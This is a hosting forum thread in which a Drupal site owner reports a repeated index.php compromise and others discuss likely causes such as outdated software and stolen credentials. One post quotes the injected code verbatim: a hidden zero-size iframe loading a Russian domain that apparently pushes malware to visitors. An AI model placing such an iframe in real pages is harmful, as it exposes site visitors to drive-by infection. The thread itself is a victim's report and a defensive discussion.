Drupal hacked

[akreider2]

One of my drupal sites got hacked for the second time with the *same* hack.

The index.php has an iframe in it at the end that opens up a website that tries to install a program on your computer (only works for old browsers).

Because of this, Google has listed my site as having malicious software in the search engine results.

This looks like the relevant drupal page:
http://drupal.org/node/233516

Has this happenned to anyone else?

Aaron

[akreider2]

It got hacked Aug 11, 10:38am (US EST).

Added this to the Drupal index.php:

<iframe src='http://rulon-oboev.ru/corep/index.php' width='0' height='0' style='visibility: hidden' scrolling='no' framespacing='0' frameborder='no'></iframe>

My permissions for the file are 0644. So only the owner should be able to write it.

[akreider2]

You can see this happenned 10 months ago and affected a LOT of users.

Hacker Attack

[jason]

The way that PHP is configured on JPC's servers is such that scripts are run under their owner's UID, so someone with mailicious intent can often easily access and deface the scripts on your site. While this seems like a bad thing it is actually a good idea overall--an attacker can, at most, only deface a single site, not a whole server and he leaves much better tracks that way as well.

You should also consider that it might not be an attack against Drupal that is to blame. Do you run any other software in your account like forums or blogs? It is quite possible that an attack against one of those resulted in the Drupal defacement as the ownership would be the same on both.

--Jason

[akreider2]

This account only runs two versions of Drupal. Very low traffic (1000 visits/month).

The Drupal 5.1 index.php got hacked. It is an old version of Drupal (and I know I should probably upgrade, but it's for such a minor site...)

This really looks exactly like what happenned 10 months ago and affected thousands of people across the internet - when it was the fault of the webhosting companies.

So far my one "fix" is to change the permissions to 444 for index.php (they were 644) - that was suggested in Drupal forums.

[JPC-Masood]

The Drupal 5.1 index.php got hacked. It is an old version of Drupal (and I know I should probably upgrade, but it's for such a minor site...)

Please see if one of these vulnerabilities still exist in your install:

http://secunia.com/product/13378/?task=advisories

[Connie]

This account only runs two versions of Drupal. Very low traffic (1000 visits/month).

The Drupal 5.1 index.php got hacked. It is an old version of Drupal (and I know I should probably upgrade, but it's for such a minor site...)

This really looks exactly like what happenned 10 months ago and affected thousands of people across the internet - when it was the fault of the webhosting companies.

So far my one "fix" is to change the permissions to 444 for index.php (they were 644) - that was suggested in Drupal forums.

I disagree that the blame can be laid on the webhost. There were 1000's of sites hacked in a lot of different countries.

Your old un-updated Drupal software may have been the culprit. How do you log into your CP? How do you check email? How do you connect to the server to upload files?

If your not using secure connections for all the above a packet sniffer may have got your login information.

These were very advanced hackers. As far as I know, no one knows for sure how they gained access to the hacked sites. There could have been multiple methods.

Months later I still get traffic to this Blog post about the IFrame Hack.

I think as soon as the support staff found out that sites on their servers were being hacked they acted responsibly. Even if and I emphasize if it was a weakness on their part, the only way you find out about a weakness is when someone exploits it.

Your virus software updates after a new virus is discovered. Your browser updates after weakness are discovered.

It's easy to say it's the host fault. Website owners have the responsibility of keeping their stuff up to date.

It is possible that if you had updated your Drupal install that receives very litte traffic that you would not have been hacked. After all the updated version did not get hacked.

Why did Drupal offer a update. They discovered a hole that needed to be patched.